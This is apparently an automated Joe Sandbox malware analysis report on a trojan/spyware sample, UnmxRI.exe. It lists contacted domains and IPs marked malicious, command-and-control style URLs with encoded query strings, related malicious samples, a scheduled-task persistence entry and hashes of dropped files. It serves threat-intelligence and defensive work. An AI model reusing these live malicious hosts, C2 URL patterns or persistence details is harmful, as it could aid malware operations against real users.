                                https://www.cloudflare.com/5xx-error-landing/print.exe, 00000010.00000002.4497033740.00000000041B6000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000003DA6000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/assets/jquery/dist/jquery.min.jsprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ListingZen.comprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://s3-us-west-2.amazonaws.com/listingzen/vendors/vendor2/450/vendor1472074370.jpgprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=print.exe, 00000010.00000002.4498619880.00000000071F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.noobblaster.comNUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4497267348.00000000050DC000.00000040.80000000.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.theranchobizarro.com/sitemap.xmlprint.exe, 00000010.00000002.4497033740.00000000039DC000.00000004.10000000.00040000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.00000000035CC000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.hover.com/?source=parkedNUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                122.10.12.59
                                		2xin1.zhanghonghong.comHong Kong
                                		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                52.9.242.57
                                		www.theranchobizarro.comUnited States
                                		16509AMAZON-02UStrue
                                212.32.237.90
                                		www.sportspaj.comNetherlands
                                		60781LEASEWEB-NL-AMS-01NetherlandsNLtrue
                                167.172.228.26
                                		nexgen-gaming.comUnited States
                                		14061DIGITALOCEAN-ASNUStrue
                                91.195.240.19
                                		parkingpage.namecheap.comGermany
                                		47846SEDO-ASDEtrue
                                66.29.154.248
                                		www.slimdut.topUnited States
                                		19538ADVANTAGECOMUStrue
                                104.21.92.135
                                		www.otomain.infoUnited States
                                		13335CLOUDFLARENETUStrue
                                119.18.54.85
                                		gpcamservices.comIndia
                                		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                216.40.34.41
                                		www.hugelmann.orgCanada
                                		15348TUCOWSCAtrue

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1501599
                                Start date and time:2024-08-30 07:17:07 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 11m 42s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:20
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:2
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:UnmxRI.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@23/16@16/9
                                EGA Information:
                                • Successful, ratio: 83.3%
                                HCA Information:
                                • Successful, ratio: 92%
                                • Number of executed functions: 164
                                • Number of non-executed functions: 315
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                01:17:58API Interceptor2x Sleep call for process: UnmxRI.exe modified
                                01:18:00API Interceptor47x Sleep call for process: powershell.exe modified
                                01:18:05API Interceptor2x Sleep call for process: tehuvFgZlLZK.exe modified
                                01:18:52API Interceptor11710856x Sleep call for process: print.exe modified
                                07:18:00Task SchedulerRun new task: tehuvFgZlLZK path: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                122.10.12.5919.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                • www.uty803.com/fgkz/?LpdH=aeeJEj57mUSUfFc8r0lYWf5TLjzOukydlBenCzdgyGJ4dbEC60EhS0rD3xa7pQMeZFPdLFyN09CO6nuGrnlRVHPUs+P1ofJutg==&B6npQ=O8V8yF7x
                                18.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                • www.uty803.com/fgkz/?m0v4zfJ=aeeJEj57mUSUfFc8r0lYWf5TLjzOukydlBenCzdgyGJ4dbEC60EhS0rD3xa7pQMeZFPdLFyN09CO6nuGrnlRDmrKntXOv7Bqsw==&rFOH=HFl0
                                52.9.242.57Purchase_Order_1021234.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • www.theranchobizarro.com/re5q/?hpZTh=x7DdztD1DQYogG+YgmdHLmcN9EpKHsYrndaK9pl4g8Kh/LQvMQ9WClrevhqBaPKBJuzjDfrRxEWLH4uL4lCAzodkcrrojO+njQ==&_dspz=cFv8vzExQX
                                19.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                • www.theranchobizarro.com/fgkz/?LpdH=ry+CYqlVG72iLi2DaEIeXBgMIr7sqRG0JYSJyoRnJC6JbGcr+8VOMaxMsy8Il53Bf6hY6wX/QfSecMpBbFe8/i9kDo1hW/mWHw==&B6npQ=O8V8yF7x
                                18.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                • www.theranchobizarro.com/fgkz/?m0v4zfJ=ry+CYqlVG72iLi2DaEIeXBgMIr7sqRG0JYSJyoRnJC6JbGcr+8VOMaxMsy8Il53Bf6hY6wX/QfSecMpBbFe8pDZ6I7taRbuSGg==&rFOH=HFl0
                                DHLDOC.exeGet hashmaliciousFormBookBrowse
                                • www.870haverford302.com/uite/?2dfdQn=Tkegjo/bbBPZ9pPFev9siXWF5vilGmxCLjWgGn67Fi7IzFijPmoRLa5EkBu2DdtxIqEA&gPz=TjU4D
                                Purchase Order-10,000MT.exeGet hashmaliciousFormBookBrowse
                                • www.thebrentwood322.com/z4m5/?8pW8=H8/SST6X8SwgHtDYnDC9232Mub9ahFzBJIhse46zGVjDUDbVLJ3/wtL9zQkBzn0+Ug1c&gD=-ZfPOL
                                212.32.237.90NGL 3200-Phase 2- Strainer.exeGet hashmaliciousFormBookBrowse
                                • www.relationshipfirst.us/zxku/?ML=uVzXijwPkXTxAbN&oH=LzaBpmw0qv0cK+7T7t8VzlGZoZLHmo5orxIVpXGhhpJEoQVn8DIg0i9de8yEo76YxD/IFdbD3aZ704STPEL3y557c1UDETTaoXzt+M3S+FXfnOPSiu5zpQrIkFFcKpPk7w==
                                M.R NO. 1212-00-RE-REQ-649-01.scr.exeGet hashmaliciousFormBookBrowse
                                • www.relationshipfirst.us/zxku/?8DVHhn=LzaBpmw0qv0cK+7T7t8VzlGZoZLHmo5orxIVpXGhhpJEoQVn8DIg0i9de8yEo76YxD/IFdbD3aZ704STPEL3z8BjBGMAEQvo533X+Pbk+W+a0qrOifxfk1DHpUlEPreqt3KVifU=&DNnlG=PlN8o25pW6
                                KOSTCO OFFER REF 440724.scr.exeGet hashmaliciousFormBookBrowse
                                • www.relationshipfirst.us/zxku/?nXTD=LzaBpmw0qv0cK+7T7t8VzlGZoZLHmo5orxIVpXGhhpJEoQVn8DIg0i9de8yEo76YxD/IFdbD3aZ704STPEL30756ckkACAv4vH2g9/7hp3eo3aqdgw==&v4Y0s=ax58AbrX
                                D7C08A686196D6C28D4F79588AEC7A0CA0123E35C57A9.exeGet hashmaliciousVidarBrowse
                                • hotticketsale.com/vcruntime140.dll
                                #U8be2#U4ef7.pdf.exeGet hashmaliciousFormBookBrowse
                                • www.instadispatch.co.uk/rdc9/?hq=KjQvKq0bEfjAnyoSdwdYuOZw5kyXMFtVzgJKaPs3a1dgUhwYueKNtGXRYHNhGFGRSqgL3uZpuNnWwMvDl+3TJIivPPCgGgZSPQ==&wx-P=hVjS
                                Copie a bonului de plata.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                • www.stillwatersagawork.com/3nop/
                                rfxJzZjiWv.exeGet hashmaliciousLokibotBrowse
                                • naourl.com/data/five/fre.php
                                PVCbiDUqly50DqS.exeGet hashmaliciousFormBookBrowse
                                • www.lendisty.com/n3kw/?XBZ4Xz=3e7Yc+NXVXGadH5y5BNj3Y3Se2h8oiNm35D3uKayWhE9KadvN5yxkmKGsLBu645DSWG9&5jJtSj=uXStFZp8ar
                                Fatura - Ex#35175382.pdf.exeGet hashmaliciousFormBookBrowse
                                • www.mwal.art/mabs/?jX8=3fQLnD&s0=y5mht5ETURUFzQSCIUXjodTlI+2TrsvqVBKlsua0zkPwCIYtRvvnPuF29Yxp6gBGwBsBQjQVNQ==
                                1lHMXoDyPa.exeGet hashmaliciousFormBookBrowse
                                • www.thetravellingwitch.com/wufn/?jrDHJt=SkZZDimXYK2GAldHwXdupEC24fazy/RNnOtrI6tDOvPCvzBdUVr3zvvTsRlAE2ql+mXxxlQZWg==&fR-=_JE8XJdXJfIL8n7

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                www.otomain.infoPO-230270.exeGet hashmaliciousFormBookBrowse
                                • 172.67.194.133
                                INVOICE_6843497.exeGet hashmaliciousFormBookBrowse
                                • 172.67.194.133
                                ai0bE8523b3IsUB.exeGet hashmaliciousFormBookBrowse
                                • 172.67.194.133
                                19.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                • 172.67.194.133
                                18.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                • 104.21.23.97
                                www.theranchobizarro.comPurchase_Order_1021234.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 52.9.242.57
                                19.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                • 52.9.242.57
                                18.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                • 52.9.242.57
                                www.sportspaj.comstvtnhaf3hcj.exeGet hashmaliciousFormBookBrowse
                                • 63.141.242.43
                                Kwserhekrq.exeGet hashmaliciousFormBookBrowse
                                • 81.17.18.197
                                MAFIN SRL INVOICE.gzGet hashmaliciousFormBookBrowse
                                • 192.187.111.219
                                INVOICE 18102023 PDF.lzhGet hashmaliciousFormBookBrowse
                                • 81.17.18.197
                                Purchase_order.exeGet hashmaliciousUnknownBrowse
                                • 81.17.29.147
                                19.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                • 81.17.29.146
                                2xin1.zhanghonghong.com19.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                • 122.10.12.59
                                18.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                • 122.10.12.59
                                www.slimdut.topstvtnhaf3hcj.exeGet hashmaliciousFormBookBrowse
                                • 66.29.154.248
                                19.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                • 66.29.154.248
                                18.10.2023_Tarihli_#U0130#U015flem_Dekontu.exeGet hashmaliciousUnknownBrowse
                                • 66.29.154.248

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                AMAZON-02USsora.m68k.elfGet hashmaliciousMiraiBrowse
                                • 35.154.242.253
                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                • 54.97.170.243
                                https://eu-central-1.protection.sophos.com/?d=manychat.com&u=aHR0cHM6Ly9teS5tYW55Y2hhdC5jb20vcj9hY3Q9YjFkMWQwZDkyMDBkMzg2OGQxODUzY2NhYTk0Y2MxYmQmdT03ODg3NjgyNjIxMzQyNDMwJnA9MTAzMTAzNDUyNjg5OTI1Jmg9YTM4ZGRlMzNiMCZmYmNsaWQ9SXdaWGgwYmdOaFpXMENNVEFBQVIyNTVGWGl1MGk2VnFpR29zYktwampSVVgxQllIR2VXMjIzY0VsdzhQV1JxQkljdzFwOEtxQ3QydHNfYWVtX3djeUE3ZklHUmc5anZ3elZEVUZnc1E=&p=m&i=NjM1OGY5Yjk1Yzc0NzYwZmVkZjg4ODBh&t=UnJja2pSclhrTCtBamxpVW5SbExkeEY5Y3JMRXJReFA1MHNjMk83N01UTT0=&h=ac3121ecdd334a8eb27b9efa20223e6a&s=AVNPUEhUT0NFTkNSWVBUSVYt5nkMY7lrXten-tMtQEoHjKHanPDgFGYEyZWMpkBETxK29AsSDujuoNOgxyOGay3pj-cHDVi7N9Bi-dbvWmnMoslvZEuKFbMo_q4CIRO7yQGet hashmaliciousUnknownBrowse
                                • 3.161.82.129
                                gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                                • 76.76.21.123
                                sora.ppc.elfGet hashmaliciousUnknownBrowse
                                • 44.224.113.100
                                sora.arm.elfGet hashmaliciousMiraiBrowse
                                • 13.251.32.76
                                kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
                                • 76.76.21.241
                                https://www.dropbox.com/scl/fi/op070xas0eh2p222upauu/Document-1.docx?rlkey=lrjcxds4fso3d5dmmlv1itair&st=c1fl3n2k&dl=0Get hashmaliciousHTMLPhisherBrowse
                                • 35.157.212.223
                                http://billion-9h3r5zfrt-marhokate-gmailcom.vercel.app/Get hashmaliciousUnknownBrowse
                                • 76.76.21.164
                                http://lkiyt.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                • 52.38.248.139
                                LEASEWEB-NL-AMS-01NetherlandsNLhttps://daehwa.info/uploaded/file/71677108868.pdfGet hashmaliciousPDFPhishBrowse
                                • 5.79.110.170
                                https://gocloud.co.ke/ShareDocu.php/?email=cmFjaGVsakBjb21wbHl3b3Jrcy5jb20=Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                • 89.149.192.200
                                OJO!!! No lo he abiertoFwd_ Message From 646___xbx2.emlGet hashmaliciousUnknownBrowse
                                • 89.149.193.88
                                https://sjq4p0lz.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.howtogeek.com%2F%3Futm_medium=newsletter%26utm_campaign=HTG-202408281159%26utm_source=HTG-NL%26user=am9obi53aW5kQGVwcmVtaXVtLmNvbQ%26lctg=7c0d2c3042ca45dcc1d0360b05cf7ed73c0a503df62a4d7921a3eb742c01cab5/1/010001919a125aa7-c1b4578c-8e1f-4667-8509-677bedec8ac0-000000/XnQZD8ewfocpYq5Ry0SP_pMdhr0=389Get hashmaliciousUnknownBrowse
                                • 89.149.192.245
                                28082024.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 89.149.193.89
                                https://www.scribd.com/document/762765489/Advice-Notification#fullscreen&from_embedGet hashmaliciousUnknownBrowse
                                • 89.149.192.245
                                https://files.fm/u/vtrxvgdh6wGet hashmaliciousGuLoaderBrowse
                                • 89.149.192.196
                                http://es.jpwn6.shop/reda/redirect.htmlGet hashmaliciousUnknownBrowse
                                • 89.149.192.244
                                https://squad.cl:443/MTU0czVIMDg3ODR6OG4=Get hashmaliciousUnknownBrowse
                                • 37.48.68.71
                                SecuriteInfo.com.Win32.CrypterX-gen.11978.20175.exeGet hashmaliciousSystemBCBrowse
                                • 95.168.166.109
                                DIGITALOCEAN-ASNUShttps://emp.eduyield.com/el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousUnknownBrowse
                                • 164.90.176.213
                                v48ge.exeGet hashmaliciousNeconydBrowse
                                • 64.225.91.73
                                https://decktop.us/MUYKd1Get hashmaliciousUnknownBrowse
                                • 157.230.79.42
                                ungziped_file.exeGet hashmaliciousLokibotBrowse
                                • 104.248.205.66
                                PO-0Y9005373R664.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                • 104.248.205.66
                                https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1EGet hashmaliciousUnknownBrowse
                                • 104.248.15.35
                                https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1EGet hashmaliciousUnknownBrowse
                                • 104.248.15.35
                                https://1113a6f.netsolhost.com/Get hashmaliciousUnknownBrowse
                                • 138.197.61.175
                                http://pub-3a8cf82f2ab64d7aad1bd2333443f1dc.r2.dev/newdoc.htmlGet hashmaliciousUnknownBrowse
                                • 67.205.136.183
                                http://linkplea.se/doarGet hashmaliciousUnknownBrowse
                                • 165.22.250.235
                                DXTL-HKDXTLTseungKwanOServiceHKhttp://hcmexelatech.comGet hashmaliciousUnknownBrowse
                                • 156.245.239.131
                                https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.cexz.top%2FTrade%2Ftradelist.html%3Ffbclid%3DIwZXh0bgNhZW0CMTAAAR3QXxe8AlutZYqRLhy6kfcRHX7ox79ANtoHkL5MFDvM9u_NxfXkkNAfcbE_aem_UDbPgNljQReqTdyzL1qAnA&h=AT0q7wmRkcJcM0QgxkcKmXpzdiZ2ZUH5T5Kvlz7u1IbzLVp1YAb0xfnp9rD61UTjjRPU9g0CsI9wwbfTxhZZHMiitY__RjpLcm73Ll-O6mHfrnKHdskDQLcrIZpxdHQfGWYjzAGet hashmaliciousUnknownBrowse
                                • 156.225.111.18
                                http://kucoin0101.com/index/index/lang/de-deGet hashmaliciousUnknownBrowse
                                • 156.225.111.22
                                http://kucoin0101.com/index/index/lang/de-de/Trade/tradelistGet hashmaliciousUnknownBrowse
                                • 156.225.111.18
                                http://kucoin0101.com/index/index/lang/de-de/Trade/tradelist/Trade/tradelistGet hashmaliciousUnknownBrowse
                                • 156.225.111.17
                                Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                • 154.85.183.50
                                roundwood.exeGet hashmaliciousSimda StealerBrowse
                                • 154.85.183.50
                                KKveTTgaAAsecNNaaaa.spc.elfGet hashmaliciousUnknownBrowse
                                • 154.215.184.94
                                KKveTTgaAAsecNNaaaa.mpsl.elfGet hashmaliciousUnknownBrowse
                                • 198.44.255.241
                                xWTju4vS5WGet hashmaliciousMiraiBrowse
                                • 154.215.132.169

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UnmxRI.exe.log

                                Download File
                                Process:C:\Users\user\Desktop\UnmxRI.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:true
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tehuvFgZlLZK.exe.log

                                Download File
                                Process:C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2232
                                Entropy (8bit):5.380805901110357
                                Encrypted:false
                                SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZM0UyuVws:lGLHxvCsIfA2KRHmOugr1Vws
                                MD5:303DBBD911F091D7717712A35F45E8B4
                                SHA1:949B8810A45146500AC2C629EF7313DAED9FDE57
                                SHA-256:ABCF6169028E21565ECEDB05F67AC9130F84CFAE1B5E1FD6BFBE92F541922609
                                SHA-512:F2E8D695F2C1803174C51D1AFE980D39D16F6C1B8B17BF1A565ADF669566C3A9FAFD7985170386577F78D28DBE18DAD3A89149A1F167586087BD057063796B91
                                Malicious:false
                                Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_50cjj3ho.kq4.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dx25u534.mhk.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dy4y4iox.nsi.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g04nl2g1.owh.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
